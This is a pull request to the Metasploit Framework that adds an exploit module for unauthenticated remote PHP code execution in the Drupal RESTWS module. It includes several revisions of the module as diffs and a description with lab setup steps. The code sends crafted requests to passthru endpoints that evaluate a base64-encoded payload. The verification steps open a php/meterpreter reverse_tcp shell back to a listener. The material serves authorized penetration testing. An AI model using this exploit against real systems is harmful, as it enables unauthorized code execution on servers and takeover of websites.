### PR TITLE
Add Drupal RESTWS Remote Unauth PHP Code Exec

### DIFF
--- a/modules/exploits/unix/webapp/drupal_restws_exec.rb
+++ b/modules/exploits/unix/webapp/drupal_restws_exec.rb
@@ -53,10 +53,12 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def check
     r = rand_text_alpha(8 + rand(4))
-    url = normalize_uri(target_uri.path, "?q=taxonomy_vocabulary/", r , "/passthru/echo%20#{r}")
     res = send_request_cgi(
       'method' => 'GET',
-      'uri' => url
+      'uri' => normalize_uri(target_uri.path, "index.php"),
+      'vars_get' => {
+          'q' => "taxonomy_vocabulary/#{r}/passthru/echo #{r}"
+      }
     )
     if res && res.body =~ /#{r}/
       return Exploit::CheckCode::Appears
@@ -66,15 +68,13 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def exploit
     random = rand_text_alpha(1 + rand(2))
-    url = normalize_uri(target_uri.path,
-      "?q=taxonomy_vocabulary/",
-      random ,
-      "/passthru/",
-      Rex::Text.uri_encode("php -r 'eval(base64_decode(\"#{Rex::Text.encode_base64(payload.encoded)}\"));'")
-    )
+    cmd = "php -r 'eval(base64_decode(\"#{Rex::Text.encode_base64(payload.encoded)}\"));'"
     send_request_cgi(
       'method' => 'GET',
-      'uri' => url
+      'uri' => normalize_uri(target_uri.path, "index.php"),
+      'vars_get' => {
+          'q' => "taxonomy_vocabulary/#{random}/passthru/#{cmd}"
+      }
     )
   end
 end

--- a/modules/exploits/unix/webapp/drupal_restws_exec.rb
+++ b/modules/exploits/unix/webapp/drupal_restws_exec.rb
@@ -63,9 +63,10 @@ class MetasploitModule < Msf::Exploit::Remote
       }
     )
     if res && res.body.include?(r)
-      return Exploit::CheckCode::Vulnerable
+      Exploit::CheckCode::Vulnerable
+    else
+      Exploit::CheckCode::Safe
     end
-    return Exploit::CheckCode::Safe
   end
 
   def exploit

--- a/modules/exploits/unix/webapp/drupal_restws_exec.rb
+++ b/modules/exploits/unix/webapp/drupal_restws_exec.rb
@@ -71,7 +71,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def exploit
     r = rand_text_alpha(4 + rand(4))
-    url = normalize_uri(target_uri.path, "taxonomy_vocabulary/" + r + "/passthru/" + Rex::Text.uri_encode(payload.encoded))
+    url = normalize_uri(target_uri.path, "taxonomy_vocabulary/", r ,"/passthru/", Rex::Text.uri_encode(payload.encoded))
     send_request_cgi(
       'method' => 'GET',
       'uri' => url

--- a/modules/exploits/unix/webapp/drupal_restws_exec.rb
+++ b/modules/exploits/unix/webapp/drupal_restws_exec.rb
@@ -3,8 +3,6 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-require 'msf/core'
-
 class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
@@ -14,13 +12,17 @@ class MetasploitModule < Msf::Exploit::Remote
     super(update_info(info,
       'Name'           => 'Drupal RESTWS Module 7.x Remote PHP Code Execution',
       'Description'    => %q{
-        This module exploits the Drupal RESTWS module vulnerability.
+        This module exploits a Remote PHP Code Execution vulnerability in
+        Drupal RESTWS Module. Unauthenticated users can execute arbitrary code
+        under the context of the web server user.
+
         RESTWS alters the default page callbacks for entities to provide
         additional functionality. A vulnerability in this approach allows
         an unauthenticated attacker to send specially crafted requests resulting
-        in arbitrary PHP execution
+        in arbitrary PHP execution. RESTWS 2.x prior to 2.6 and 1.x prior to 1.7
+        versions are affected by issue.
 
-        This module was tested against RESTWS 7.x with Drupal 7.5 installation on Ubuntu server.
+        This module was tested against RESTWS 2.5 with Drupal 7.5 installation on Ubuntu server.
       },
       'License'        => MSF_LICENSE,
       'Author'         =>
@@ -47,7 +49,7 @@ class MetasploitModule < Msf::Exploit::Remote
     register_options(
       [
         OptString.new('TARGETURI', [ true, "The target URI of the Drupal installation", '/'])
-      ], self.class
+      ]
     )
   end
 
@@ -57,11 +59,11 @@ class MetasploitModule < Msf::Exploit::Remote
       'method' => 'GET',
       'uri' => normalize_uri(target_uri.path, "index.php"),
       'vars_get' => {
-          'q' => "taxonomy_vocabulary/#{r}/passthru/echo #{r}"
+        'q' => "taxonomy_vocabulary/#{r}/passthru/echo #{r}"
       }
     )
-    if res && res.body =~ /#{r}/
-      return Exploit::CheckCode::Appears
+    if res && res.body.include?(r)
+      return Exploit::CheckCode::Vulnerable
     end
     return Exploit::CheckCode::Safe
   end
@@ -73,7 +75,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'method' => 'GET',
       'uri' => normalize_uri(target_uri.path, "index.php"),
       'vars_get' => {
-          'q' => "taxonomy_vocabulary/#{random}/passthru/#{cmd}"
+        'q' => "taxonomy_vocabulary/#{random}/passthru/#{cmd}"
       }
     )
   end

--- a/modules/exploits/unix/webapp/drupal_restws_exec.rb
+++ b/modules/exploits/unix/webapp/drupal_restws_exec.rb
@@ -35,16 +35,10 @@ class MetasploitModule < Msf::Exploit::Remote
       'Privileged'     => false,
       'Payload'        =>
         {
-          'DisableNops' => true,
-          'Space'       => 1024,
-          'Compat'      =>
-            {
-                'PayloadType' => 'cmd',
-                'RequiredCmd' => 'generic python',
-            }
+          'DisableNops' => true
         },
-      'Platform'       => 'unix',
-      'Arch'           => ARCH_CMD,
+      'Platform'       => ['php'],
+      'Arch'           => ARCH_PHP,
       'Targets'        => [ ['Automatic', {}] ],
       'DisclosureDate' => 'Jul 13 2016',
       'DefaultTarget'  => 0
@@ -58,20 +52,26 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def check
-    url = normalize_uri(target_uri.path, "node.xml")
+    r = rand_text_alpha(8 + rand(4))
+    url = normalize_uri(target_uri.path, "?q=taxonomy_vocabulary/", r , "/passthru/echo%20#{r}")
     res = send_request_cgi(
       'method' => 'GET',
       'uri' => url
     )
-    if res && res.code == 403
+    if res && res.body =~ /#{r}/
       return Exploit::CheckCode::Appears
     end
     return Exploit::CheckCode::Safe
   end
 
   def exploit
-    r = rand_text_alpha(4 + rand(4))
-    url = normalize_uri(target_uri.path, "taxonomy_vocabulary/", r ,"/passthru/", Rex::Text.uri_encode(payload.encoded))
+    random = rand_text_alpha(1 + rand(2))
+    url = normalize_uri(target_uri.path,
+      "?q=taxonomy_vocabulary/",
+      random ,
+      "/passthru/",
+      Rex::Text.uri_encode("php -r 'eval(base64_decode(\"#{Rex::Text.encode_base64(payload.encoded)}\"));'")
+    )
     send_request_cgi(
       'method' => 'GET',
       'uri' => url

--- a/modules/exploits/unix/webapp/drupal_restws_exec.rb
+++ b/modules/exploits/unix/webapp/drupal_restws_exec.rb
@@ -59,7 +59,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'method' => 'GET',
       'uri' => normalize_uri(target_uri.path, "index.php"),
       'vars_get' => {
-        'q' => "taxonomy_vocabulary/#{r}/passthru/echo #{r}"
+        'q' => "taxonomy_vocabulary//passthru/echo #{r}"
       }
     )
     if res && res.body.include?(r)
@@ -69,13 +69,12 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    random = rand_text_alpha(1 + rand(2))
     cmd = "php -r 'eval(base64_decode(\"#{Rex::Text.encode_base64(payload.encoded)}\"));'"
     send_request_cgi(
       'method' => 'GET',
       'uri' => normalize_uri(target_uri.path, "index.php"),
       'vars_get' => {
-        'q' => "taxonomy_vocabulary/#{random}/passthru/#{cmd}"
+        'q' => "taxonomy_vocabulary//passthru/#{cmd}"
       }
     )
   end

--- a/modules/exploits/unix/webapp/drupal_restws_exec.rb
+++ b/modules/exploits/unix/webapp/drupal_restws_exec.rb
@@ -1,0 +1,80 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => 'Drupal RESTWS Module 7.x Remote PHP Code Execution',
+      'Description'    => %q{
+        This module exploits the Drupal RESTWS module vulnerability.
+        RESTWS alters the default page callbacks for entities to provide
+        additional functionality. A vulnerability in this approach allows
+        an unauthenticated attacker to send specially crafted requests resulting
+        in arbitrary PHP execution
+
+        This module was tested against RESTWS 7.x with Drupal 7.5 installation on Ubuntu server.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Devin Zuczek',                        # discovery
+          'Mehmet Ince <mehmet@mehmetince.net>'  # msf module
+        ],
+      'References'     =>
+        [
+          ['URL', 'https://www.drupal.org/node/2765567']
+        ],
+      'Privileged'     => false,
+      'Payload'        =>
+        {
+          'DisableNops' => true,
+          'Space'       => 1024,
+          'Compat'      =>
+            {
+                'PayloadType' => 'cmd',
+                'RequiredCmd' => 'generic python',
+            }
+        },
+      'Platform'       => 'unix',
+      'Arch'           => ARCH_CMD,
+      'Targets'        => [ ['Automatic', {}] ],
+      'DisclosureDate' => 'Jul 13 2016',
+      'DefaultTarget'  => 0
+      ))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [ true, "The target URI of the Drupal installation", '/'])
+      ], self.class
+    )
+  end
+
+  def check
+    url = normalize_uri(target_uri.path, "node.xml")
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => url
+    )
+    if res && res.code == 403
+      return Exploit::CheckCode::Appears
+    end
+    return Exploit::CheckCode::Safe
+  end
+
+  def exploit
+    r = rand_text_alpha(4 + rand(4))
+    url = normalize_uri(target_uri.path, "taxonomy_vocabulary/" + r + "/passthru/" + Rex::Text.uri_encode(payload.encoded))
+    send_request_cgi(
+      'method' => 'GET',
+      'uri' => url
+    )
+  end
+end


### PR DESCRIPTION
This modules exploits RESTWS module for Drupal 7.x which is installed ~10k all over the world. Patch was released several days ago by Drupal Security Team.

Since the exploitation is trivial and very easy to implement msf module, you may NOT to land this pull request. It's totally okay 👍 
## Installation

Since Kali has upgraded their PHP version to 7.0, this might be trouble for Drupal 7.0 . So my suggestion is use PHP 5.x 
- Download latest Drupal (which is 7.5 right now) and install it.
- Download following 2 module and extract it under the sites/all/modules . Entity modules is must be installed due to RESTWS dependency.

https://ftp.drupal.org/files/projects/entity-7.x-1.7.zip
https://ftp.drupal.org/files/projects/restws-7.x-2.5.tar.gz
- Enable both through administrator panel ( Administrator > Modules > -at the end of the list- )
## Verification
- [ ] Start `msfconsole`
- [ ] `use exploit/unix/webapp/drupal_restws_exec`
- [ ] `set RHOST 10.0.0.157`
- [ ] `set TARGETURI drupal`
- [ ] `set payload php/meterpreter/reverse_tcp`
- [ ] `set LHOST 10.0.0.1`
- [ ] `exploit`
- [ ] **Verify** `Meterpreter session X opened...` prompted on your terminal. 
- [ ] Wait for a while
- [ ] **Verify** Output of `pwd` command.

<img width="785" alt="screen shot 2016-07-19 at 11 52 58" src="https://cloud.githubusercontent.com/assets/4004716/16944049/7b36824e-4da7-11e6-99b7-e99f6ba169a7.png">
